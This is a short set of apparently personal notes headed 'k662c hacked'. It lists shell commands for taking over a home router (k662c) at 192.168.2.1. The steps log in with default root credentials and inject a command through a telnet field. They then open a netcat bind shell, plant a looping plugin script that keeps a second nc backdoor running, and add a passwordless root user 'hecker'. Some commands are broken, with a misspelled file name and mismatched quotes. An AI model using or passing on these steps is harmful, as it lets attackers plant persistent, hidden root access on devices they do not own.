k662c hacked

k662c hacked

·

telnet 192.168.2.1 ( root , adminHW)

su

plugcmd start name kernelapp

telnet remote ip ;sh; port 213


进入shell,

busybox nc -l -p 2333 -e sh& (开NC)


#通过 nc 来操作

nc 192.168.2.1 2333

cd /mnt/jffs2/app/cplugin/cplugin1/

mv MyPlugin _MyPlugin (backup )

mkdir MyPlugin

echo "#!/bin/sh" >daemon.sh

echo "cd ..;cd _MyPlugin;" >> daemon.sh

echo "export LD_LIBRARY_PATH=$(pwd)/Lib:/usr/lib/glib-2.0:$LD_LIBRARY_PATH" >> daemon.sh

echo "trap ' ./plugin_stop.sh; exit 1;' 15" >> daemon.sh

echo "while true ; do" >> daemon.sh

echo " ./plugin_startup.sh" >> daemon.sh

echo " ./plugin_startup.sh" >> daemon.sh

echo " ./plugin_monitor.sh" >> daemon.sh

echo " ./plugin_keeplive.sh" >> daemon.sh

echo "done" >> daemon.sh


sed -i '/while true/a sh /mnt/jffs2/app/cplugin/cplugin1/cmd.sh' daemon.sh


chmod 777 deamon.sh


echo 'busybox nc -l -p 2339 -e sh &' > /mnt/jffs2/app/cplugin/cplugin1/cmd.sh


plugcmd start name kernelapp


nc 192.168.2.1 2339


echo 'hecker::0:0::/root:/bin/sh' >>/var/passwd


telnet remote ip ;su hecker; port 213


echo 'if cat /var/passwd | grep hecker

then

exit

fi

echo 'hecker::0:0::/root:/bin/sh' >>/var/passwd' > cmd.sh